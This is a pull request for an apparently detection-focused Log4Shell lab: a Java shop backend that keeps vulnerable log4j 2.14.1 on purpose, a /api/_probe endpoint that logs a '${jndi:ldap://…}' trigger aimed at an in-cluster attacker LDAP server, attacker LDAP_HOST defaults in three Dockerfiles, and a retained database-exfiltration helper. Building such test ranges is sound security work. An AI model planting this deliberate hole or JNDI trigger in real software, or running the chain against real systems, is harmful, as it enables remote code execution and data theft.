### PR TITLE
log4j backend: product-API + configurable LDAP endpoint (supersedes #146)

### DIFF
--- a/example/log4j-chain/backend/Dockerfile.contained
+++ b/example/log4j-chain/backend/Dockerfile.contained
@@ -11,4 +11,8 @@ RUN LOG4J_VERSION=2.14.1 mvn -B package -DskipTests
 FROM gcr.io/distroless/java11-debian11
 COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar /app/app.jar
 EXPOSE 8080
+# LDAP endpoint for the /api/_probe trigger. Here the JNDI lookup DOES fire
+# (log4j 2.14.1) but the distroless runtime has no /bin/sh, so the loaded class
+# can't spawn — the "contained" posture. Override with LDAP_HOST/LDAP_URL.
+ENV LDAP_HOST=attacker.attacker-ns.svc.cluster.local:1389
 ENTRYPOINT ["java","-jar","/app/app.jar"]

--- a/example/log4j-chain/backend/Dockerfile.patched
+++ b/example/log4j-chain/backend/Dockerfile.patched
@@ -15,4 +15,8 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
 WORKDIR /app
 COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar ./app.jar
 EXPOSE 8080
+# LDAP endpoint for the /api/_probe trigger. On this patched build the string is
+# logged literally — no lookup, no egress — so the value is inert; kept so all
+# three scenario images share one env contract. Override with LDAP_HOST/LDAP_URL.
+ENV LDAP_HOST=attacker.attacker-ns.svc.cluster.local:1389
 ENTRYPOINT ["java","-jar","/app/app.jar"]

--- a/example/log4j-chain/backend/Dockerfile.vulnerable
+++ b/example/log4j-chain/backend/Dockerfile.vulnerable
@@ -14,6 +14,12 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
 WORKDIR /app
 COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar ./app.jar
 EXPOSE 8080
+# Where the malicious LDAP referral server lives — the endpoint the Log4Shell
+# JNDI lookup dials out to. Placeholder default points at the in-repo attacker
+# Service; set LDAP_HOST (host[:port]) or LDAP_URL (full ldap:// URL) to a
+# non-private/public address so the call-out egress trips R0011. Pairs with the
+# attacker image's CODEBASE_HOST (PR #144). Consumed by App.java's /api/_probe.
+ENV LDAP_HOST=attacker.attacker-ns.svc.cluster.local:1389
 # JNDI/LDAP class loading: temurin-11 sets `com.sun.jndi.ldap.object.trustURLCodebase=false`
 # by default (since JDK 11.0.1) — without this flag the Log4Shell chain stops at
 # LDAP referral, never fetches the Payload.class. Enabling it makes the JVM

--- a/example/log4j-chain/backend/src/main/java/io/fusioncore/App.java
+++ b/example/log4j-chain/backend/src/main/java/io/fusioncore/App.java
@@ -9,57 +9,287 @@ import org.apache.logging.log4j.Logger;
 import java.io.IOException;
 import java.io.OutputStream;
 import java.net.InetSocketAddress;
+import java.nio.charset.StandardCharsets;
 import java.sql.*;
+import java.util.ArrayList;
+import java.util.List;
 import java.util.concurrent.Executors;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
 
 /**
- * Minimal HTTP API:
- *   GET  /api/products?q=...        — logs User-Agent through log4j (vulnerable surface)
- *   POST /api/login                 — accepts JSON {user,pass}, returns a fake JWT
+ * fusioncore "shop" backend — a small but REAL product API backed by postgres.
+ * Normal traffic exercises the DB on every call, so the chain's baseline includes
+ * a steady backend→postgres edge (which is what the JNDI exfil hop blends into).
  *
- * Reads postgres connection settings from env (POSTGRES_HOST, POSTGRES_USER,
- * POSTGRES_DB). Trust auth assumed.
+ *   GET  /api/products            list catalog        (logs UA through log4j — vulnerable surface)
+ *   GET  /api/products?q=&category=   filtered search (ILIKE + category)
+ *   GET  /api/products/{id}       product detail
+ *   POST /api/login               looks up user by email, returns a (fake) JWT
+ *   POST /api/cart                price lookup + total for a set of SKUs
+ *   POST /api/checkout            INSERT an order, returns order id
+ *   GET  /api/orders              recent orders
+ *   GET  /healthz                 liveness (no DB)
+ *
+ * Postgres connection comes from env (POSTGRES_HOST, POSTGRES_DB, POSTGRES_USER),
+ * trust auth (empty password) — same as the deploy manifests.
+ *
+ * Where the malicious LDAP referral server lives — the endpoint the Log4Shell
+ * JNDI lookup dials out to — is env-driven so the same image runs anywhere
+ * (mirrors the attacker image's CODEBASE_HOST/CODEBASE_URL, see PR #144):
+ *   LDAP_URL   full override, e.g. ldap://1.2.3.4:1389/Probe
+ *   LDAP_HOST  just host[:port] (default: the in-cluster attacker Service)
+ * A non-private/public LDAP_HOST is what makes the backend's call-out egress
+ * non-private, so R0011 (unexpected egress) fires — the network side of the
+ * chain. The /api/_probe endpoint fires this lookup on demand.
  */
 public class App {
     private static final Logger log = LogManager.getLogger(App.class);
 
-    public static void main(String[] args) throws IOException {
-        int port = Integer.parseInt(System.getenv().getOrDefault("PORT", "8080"));
-        HttpServer s = HttpServer.create(new InetSocketAddress(port), 0);
-        s.createContext("/api/products", new ProductHandler());
-        s.createContext("/api/login", new LoginHandler());
-        s.setExecutor(Executors.newFixedThreadPool(4));
-        s.start();
-        log.info("chain-backend started on port {}", port);
+    private static final String PG_HOST = env("POSTGRES_HOST", "chain-postgres");
+    private static final String PG_DB   = env("POSTGRES_DB", "appdb");
+    private static final String PG_USER = env("POSTGRES_USER", "postgres");
+    private static final String PG_URL  = "jdbc:postgresql://" + PG_HOST + ":5432/" + PG_DB;
+
+    /** LDAP referral endpoint the JNDI lookup dials. LDAP_URL wins; else built from LDAP_HOST. */
+    private static final String LDAP_URL = ldapUrl();
+
+    static String env(String k, String d) { String v = System.getenv(k); return (v == null || v.isEmpty()) ? d : v; }
+
+    static String ldapUrl() {
+        String url = System.getenv("LDAP_URL");
+        if (url != null && !url.isEmpty()) return url;
+        return "ldap://" + env("LDAP_HOST", "attacker.attacker-ns.svc.cluster.local:1389") + "/Probe";
     }
 
-    static class ProductHandler implements HttpHandler {
-        public void handle(HttpExchange ex) throws IOException {
-            String q = ex.getRequestURI().getQuery();
-            String ua = ex.getRequestHeaders().getFirst("User-Agent");
-            // The vulnerable line — log4j ≤ 2.14.1 will interpret ${jndi:…} here.
-            log.info("product query q={} ua={}", q, ua);
+    static Connection conn() throws SQLException { return DriverManager.getConnection(PG_URL, PG_USER, ""); }
 
-            String body = "{\"products\":[]}";
-            ex.sendResponseHeaders(200, body.length());
-            try (OutputStream os = ex.getResponseBody()) { os.write(body.getBytes()); }
+    public static void main(String[] args) throws IOException {
+        int port = Integer.parseInt(env("PORT", "8080"));
+        HttpServer s = HttpServer.create(new InetSocketAddress(port), 0);
+        s.createContext("/api/products", new ProductHandler());
+        s.createContext("/api/login",    new LoginHandler());
+        s.createContext("/api/cart",     new CartHandler());
+        s.createContext("/api/checkout", new CheckoutHandler());
+        s.createContext("/api/orders",   new OrdersHandler());
+        s.createContext("/api/_probe",   new ProbeHandler());
+        s.createContext("/healthz",      ex -> respond(ex, 200, "{\"status\":\"ok\"}"));
+        s.setExecutor(Executors.newFixedThreadPool(8));
+        s.start();
+        log.info("chain-backend started on port {} (db={}, ldap={})", port, PG_URL, LDAP_URL);
+    }
+
+    // ─────────────────── /api/_probe (configurable Log4Shell self-probe) ───────────────────
+    /**
+     * Fires the JNDI trigger at the configured LDAP endpoint through the SAME
+     * vulnerable log4j line as ProductHandler. Lets a caller trip one
+     * deterministic, off-profile LDAP egress (a falsifiability probe) without a
+     * separate attack pod — the destination is wherever LDAP_URL/LDAP_HOST points,
+     * so it pairs with the attacker image's public CODEBASE_HOST (PR #144) to
+     * exercise the network side (R0011). On a patched build the string is logged
+     * literally and no lookup happens. Normal traffic never hits this path.
+     */
+    static class ProbeHandler implements HttpHandler {
+        public void handle(HttpExchange ex) throws IOException {
+            String trigger = "${jndi:" + LDAP_URL + "}";
+            log.info("self-probe q={} ua={}", "probe", trigger);
+            respond(ex, 200, "{\"probe\":\"" + esc(LDAP_URL) + "\"}");
         }
     }
 
+    // ───────────────────────── helpers ─────────────────────────
+    static void respond(HttpExchange ex, int code, String body) throws IOException {
+        byte[] b = body.getBytes(StandardCharsets.UTF_8);
+        ex.getResponseHeaders().add("Content-Type", "application/json");
+        ex.sendResponseHeaders(code, b.length);
+        try (OutputStream os = ex.getResponseBody()) { os.write(b); }
+    }
+
+    static String param(String query, String key) {
+        if (query == null) return null;
+        for (String kv : query.split("&")) {
+            int i = kv.indexOf('=');
+            if (i > 0 && kv.substring(0, i).equals(key)) return urldecode(kv.substring(i + 1));
+        }
+        return null;
+    }
+
+    static String urldecode(String s) { try { return java.net.URLDecoder.decode(s, "UTF-8"); } catch (Exception e) { return s; } }
+
+    static String esc(String s) { return s == null ? "" : s.replace("\\", "\\\\").replace("\"", "\\\""); }
+
+    static String readBody(HttpExchange ex) throws IOException {
+        return new String(ex.getRequestBody().readAllBytes(), StandardCharsets.UTF_8);
+    }
+
+    /** demo-grade extractor for {"k":"v"} string fields. */
+    static String jsonStr(String body, String key) {
+        if (body == null) return null;
+        Matcher m = Pattern.compile("\"" + Pattern.quote(key) + "\"\\s*:\\s*\"([^\"]*)\"").matcher(body);
+        return m.find() ? m.group(1) : null;
+    }
+
+    static String productJson(ResultSet rs) throws SQLException {
+        return "{\"id\":" + rs.getInt("id")
+            + ",\"name\":\"" + esc(rs.getString("name")) + "\""
+            + ",\"sku\":\"" + esc(rs.getString("sku")) + "\""
+            + ",\"category\":\"" + esc(rs.getString("category")) + "\""
+            + ",\"price_cents\":" + rs.getInt("price_cents")
+            + ",\"stock\":" + rs.getInt("stock")
+            + ",\"description\":\"" + esc(rs.getString("description")) + "\"}";
+    }
+
+    // ─────────────────── /api/products (list + search + detail) ───────────────────
+    static class ProductHandler implements HttpHandler {
+        public void handle(HttpExchange ex) throws IOException {
+            String path  = ex.getRequestURI().getPath();
+            String query = ex.getRequestURI().getQuery();
+            String ua    = ex.getRequestHeaders().getFirst("User-Agent");
+            String q     = param(query, "q");
+            // The vulnerable line — log4j ≤ 2.14.1 interprets ${jndi:…} in the UA here. DO NOT REMOVE.
+            log.info("product query q={} ua={}", q, ua);
+
+            String idPart = path.length() > "/api/products".length()
+                ? path.substring(Math.min(path.length(), "/api/products/".length())) : null;
+            try (Connection c = conn()) {
+                if (idPart != null && idPart.matches("\\d+")) {
+                    try (PreparedStatement ps = c.prepareStatement(
+                            "SELECT id,name,sku,category,price_cents,stock,description FROM products WHERE id=?")) {
+                        ps.setInt(1, Integer.parseInt(idPart));
+                        try (ResultSet rs = ps.executeQuery()) {
+                            if (rs.next()) { respond(ex, 200, productJson(rs)); return; }
+                            respond(ex, 404, "{\"error\":\"not found\"}"); return;
+                        }
+                    }
+                }
+                String category = param(query, "category");
+                StringBuilder sql = new StringBuilder(
+                    "SELECT id,name,sku,category,price_cents,stock,description FROM products WHERE 1=1");
+                List<String> binds = new ArrayList<>();
+                if (q != null && !q.isEmpty())               { sql.append(" AND name ILIKE ?"); binds.add("%" + q + "%"); }
+                if (category != null && !category.isEmpty())  { sql.append(" AND category=?");   binds.add(category); }
+                sql.append(" ORDER BY id LIMIT 50");
+                try (PreparedStatement ps = c.prepareStatement(sql.toString())) {
+                    for (int i = 0; i < binds.size(); i++) ps.setString(i + 1, binds.get(i));
+                    try (ResultSet rs = ps.executeQuery()) {
+                        StringBuilder out = new StringBuilder("{\"products\":[");
+                        boolean first = true;
+                        while (rs.next()) { if (!first) out.append(","); out.append(productJson(rs)); first = false; }
+                        out.append("]}");
+                        respond(ex, 200, out.toString());
+                    }
+                }
+            } catch (SQLException e) {
+                log.warn("products query failed: {}", e.getMessage());
+                respond(ex, 503, "{\"error\":\"db unavailable\"}");
+            }
+        }
+    }
+
+    // ─────────────────── /api/login (look up user) ───────────────────
     static class LoginHandler implements HttpHandler {
         public void handle(HttpExchange ex) throws IOException {
-            // Accepts any creds, returns a fake JWT. Stage-1 auth is not the
-            // detection focus in any scenario.
-            String body = "{\"token\":\"fake.jwt.token\"}";
-            ex.sendResponseHeaders(200, body.length());
-            try (OutputStream os = ex.getResponseBody()) { os.write(body.getBytes()); }
+            String body = readBody(ex);
+            String user = jsonStr(body, "user");
+            if (user == null) user = jsonStr(body, "email");
+            try (Connection c = conn();
+                 PreparedStatement ps = c.prepareStatement("SELECT id,full_name FROM users WHERE email=?")) {
+                ps.setString(1, user == null ? "" : user);
+                try (ResultSet rs = ps.executeQuery()) {
+                    if (rs.next())
+                        respond(ex, 200, "{\"token\":\"fake.jwt." + rs.getInt("id")
+                            + "\",\"name\":\"" + esc(rs.getString("full_name")) + "\"}");
+                    else
+                        respond(ex, 200, "{\"token\":\"fake.jwt.token\"}");
+                }
+            } catch (SQLException e) {
+                // login is not the detection focus in any scenario — fail open.
+                respond(ex, 200, "{\"token\":\"fake.jwt.token\"}");
+            }
+        }
+    }
+
+    // ─────────────────── /api/cart (price lookup + total) ───────────────────
+    static class CartHandler implements HttpHandler {
+        public void handle(HttpExchange ex) throws IOException {
+            String skus = jsonStr(readBody(ex), "skus");
+            if (skus == null || skus.isEmpty()) { respond(ex, 200, "{\"items\":[],\"total_cents\":0}"); return; }
+            String[] arr = skus.split(",");
+            try (Connection c = conn()) {
+                StringBuilder in = new StringBuilder();
+                for (int i = 0; i < arr.length; i++) in.append(i == 0 ? "?" : ",?");
+                try (PreparedStatement ps = c.prepareStatement(
+                        "SELECT sku,name,price_cents FROM products WHERE sku IN (" + in + ")")) {
+                    for (int i = 0; i < arr.length; i++) ps.setString(i + 1, arr[i].trim());
+                    try (ResultSet rs = ps.executeQuery()) {
+                        StringBuilder out = new StringBuilder("{\"items\":[");
+                        int total = 0; boolean first = true;
+                        while (rs.next()) {
+                            if (!first) out.append(","); first = false;
+                            int pc = rs.getInt("price_cents"); total += pc;
+                            out.append("{\"sku\":\"" + esc(rs.getString("sku")) + "\",\"name\":\""
+                                + esc(rs.getString("name")) + "\",\"price_cents\":" + pc + "}");
+                        }
+                        out.append("],\"total_cents\":" + total + "}");
+                        respond(ex, 200, out.toString());
+                    }
+                }
+            } catch (SQLException e) { respond(ex, 503, "{\"error\":\"db unavailable\"}"); }
+        }
+    }
+
+    // ─────────────────── /api/checkout (INSERT order) ───────────────────
+    static class CheckoutHandler implements HttpHandler {
+        public void handle(HttpExchange ex) throws IOException {
+            String body = readBody(ex);
+            String userEmail = jsonStr(body, "user"); if (userEmail == null) userEmail = "guest@example.com";
+            String skus = jsonStr(body, "skus");      if (skus == null) skus = "";
+            try (Connection c = conn()) {
+                int total = 0;
+                if (!skus.isEmpty()) {
+                    String[] arr = skus.split(",");
+                    StringBuilder in = new StringBuilder();
+                    for (int i = 0; i < arr.length; i++) in.append(i == 0 ? "?" : ",?");
+                    try (PreparedStatement ps = c.prepareStatement(
+                            "SELECT COALESCE(SUM(price_cents),0) FROM products WHERE sku IN (" + in + ")")) {
+                        for (int i = 0; i < arr.length; i++) ps.setString(i + 1, arr[i].trim());
+                        try (ResultSet rs = ps.executeQuery()) { if (rs.next()) total = rs.getInt(1); }
+                    }
+                }
+                int orderId;
+                try (PreparedStatement ps = c.prepareStatement(
+                        "INSERT INTO orders(user_email,total_cents,items) VALUES (?,?,?) RETURNING id")) {
+                    ps.setString(1, userEmail); ps.setInt(2, total); ps.setString(3, skus);
+                    try (ResultSet rs = ps.executeQuery()) { rs.next(); orderId = rs.getInt(1); }
+                }
+                respond(ex, 200, "{\"order_id\":" + orderId + ",\"total_cents\":" + total + "}");
+            } catch (SQLException e) { respond(ex, 503, "{\"error\":\"db unavailable\"}"); }
+        }
+    }
+
+    // ─────────────────── /api/orders (recent) ───────────────────
+    static class OrdersHandler implements HttpHandler {
+        public void handle(HttpExchange ex) throws IOException {
+            try (Connection c = conn();
+                 PreparedStatement ps = c.prepareStatement(
+                     "SELECT id,user_email,total_cents FROM orders ORDER BY id DESC LIMIT 20");
+                 ResultSet rs = ps.executeQuery()) {
+                StringBuilder out = new StringBuilder("{\"orders\":[");
+                boolean first = true;
+                while (rs.next()) {
+                    if (!first) out.append(","); first = false;
+                    out.append("{\"id\":" + rs.getInt("id") + ",\"user_email\":\""
+                        + esc(rs.getString("user_email")) + "\",\"total_cents\":" + rs.getInt("total_cents") + "}");
+                }
+                out.append("]}");
+                respond(ex, 200, out.toString());
+            } catch (SQLException e) { respond(ex, 503, "{\"error\":\"db unavailable\"}"); }
         }
     }
 
     /**
-     * Called by the Payload class (loaded via JNDI). In scenario A the
-     * distroless backend is missing, so an /bin/sh-based exfil works.
-     * In B the same Payload class loads but Runtime.exec() fails ENOENT.
+     * Preserved for the JNDI Payload contract (scenarios A/B). The shipped Payload runs
+     * psql via /bin/sh directly; this documents the exfil intent and keeps the symbol.
      */
     public static String queryPostgresAndExfil(String host, String db, String user) {
         try (Connection c = DriverManager.getConnection("jdbc:postgresql://" + host + ":5432/" + db, user, "")) {

--- a/example/log4j-chain/postgres/seed.sql
+++ b/example/log4j-chain/postgres/seed.sql
@@ -1,13 +1,56 @@
--- Seed PII-shaped data so the DNS exfil payload is realistically sized
--- and the verdict has something to point at.
-CREATE TABLE users (
+-- fusioncore shop schema + seed. Loaded by postgres via /docker-entrypoint-initdb.d.
+-- Normal backend traffic (App.java) reads products/users and writes orders on every
+-- request, so the chain baseline has a steady backend→postgres edge. The JNDI exfil
+-- (psql from /bin/sh) then blends into that DB traffic at the network layer, while the
+-- process spawn (/bin/sh, psql) stays the Scenario-A R0001 tell.
+
+CREATE TABLE IF NOT EXISTS products (
     id          SERIAL PRIMARY KEY,
-    email       TEXT,
-    full_name   TEXT,
+    name        TEXT NOT NULL,
+    sku         TEXT UNIQUE NOT NULL,
+    category    TEXT NOT NULL,
+    price_cents INT  NOT NULL,
+    stock       INT  NOT NULL DEFAULT 100,
+    description TEXT
+);
+
+INSERT INTO products (name, sku, category, price_cents, stock, description) VALUES
+    ('Widget',          'WID-001', 'widgets',  999,   250, 'A reliable everyday widget'),
+    ('Widget Pro',      'WID-002', 'widgets',  1999,  120, 'The widget, but pro'),
+    ('Mega Widget',     'WID-003', 'widgets',  3499,  40,  'Industrial-grade widget'),
+    ('Gadget',          'GAD-001', 'gadgets',  1499,  200, 'A handy gadget'),
+    ('Gadget Mini',     'GAD-002', 'gadgets',  799,   300, 'Pocket-sized gadget'),
+    ('Smart Gadget',    'GAD-003', 'gadgets',  4999,  60,  'Gadget with a chip in it'),
+    ('Thingamajig',     'THI-001', 'tools',    1299,  150, 'When you need a thingamajig'),
+    ('Doohickey',       'DOO-001', 'tools',    599,   500, 'Cheap and cheerful doohickey'),
+    ('Sprocket',        'SPR-001', 'parts',    349,   900, 'Toothed sprocket, 12T'),
+    ('Cog',             'COG-001', 'parts',    249,   900, 'Replacement cog'),
+    ('Flux Capacitor',  'FLX-001', 'specials', 99999, 3,   'Makes time travel possible'),
+    ('Bobblehead',      'BOB-001', 'specials', 1599,  75,  'Limited edition bobblehead')
+ON CONFLICT (sku) DO NOTHING;
+
+CREATE TABLE IF NOT EXISTS users (
+    id            SERIAL PRIMARY KEY,
+    email         TEXT UNIQUE NOT NULL,
+    full_name     TEXT,
+    password_hash TEXT,
+    created_at    TIMESTAMP DEFAULT NOW()
+);
+
+INSERT INTO users (email, full_name, password_hash) VALUES
+    ('alice@example.com', 'Alice Anderson', 'x'),
+    ('bob@example.com',   'Bob Brown',      'x'),
+    ('carol@example.com', 'Carol Carter',   'x'),
+    ('dave@example.com',  'Dave Davis',     'x'),
+    ('erin@example.com',  'Erin Edwards',   'x')
+ON CONFLICT (email) DO NOTHING;
+
+CREATE TABLE IF NOT EXISTS orders (
+    id          SERIAL PRIMARY KEY,
+    user_email  TEXT,
+    total_cents INT,
+    items       TEXT,
     created_at  TIMESTAMP DEFAULT NOW()
 );
-INSERT INTO users (email, full_name) VALUES
-    ('alice@example.com', 'Alice Anderson'),
-    ('bob@example.com',   'Bob Brown'),
-    ('carol@example.com', 'Carol Carter');
-GRANT ALL ON users TO postgres;
+
+GRANT ALL ON ALL TABLES IN SCHEMA public TO postgres;


### PR DESCRIPTION
Lands the product-API backend + configurable LDAP call-out **directly onto `main`** — the CI-green, focused alternative to #146 (which was based on `feat/argocd-demo` and would drag that whole demo branch).

## Why
`main` still ships the **stub** backend: `ProductHandler` returns `{"products":[]}` and never opens a postgres connection. That is:
- the root cause of the **"zero pg-wire / psql-not-in-pixie"** incident (dx issue-tracked; fixed live by switching to this image), and
- inconsistent with the merged **#148** SBoB, which already allow-lists product endpoints (`cart`/`checkout`/`orders`) the stub doesn't serve.

## What
5-file delta (no `pom.xml`/`log4j2.xml`/`postgres.yaml` change):
- **`App.java`** — real product API backed by postgres: `SELECT` per `/api/products`, `INSERT` on checkout → genuine benign backend→postgres pg-wire on the normal path.
- **`LDAP_HOST`/`LDAP_URL` env + `GET /api/_probe`** — configurable JNDI call-out target; pairs with the attacker image's `CODEBASE_HOST` (#144). Unset = prior behavior.
- **`seed.sql`** — products/users/orders schema + seed.
- **`ENV LDAP_HOST`** in all three scenario Dockerfiles.

This is the source of the already-published `ghcr.io/k8sstormcenter/log4j-chain-backend-vulnerable@sha256:c440008667…`, which **dx confirmed live** generates pg-wire and fires the full R0001 chain end to end.

Supersedes #146 (I'll close it once this is green).

🤖 Generated with [Claude Code](https://claude.com/claude-code)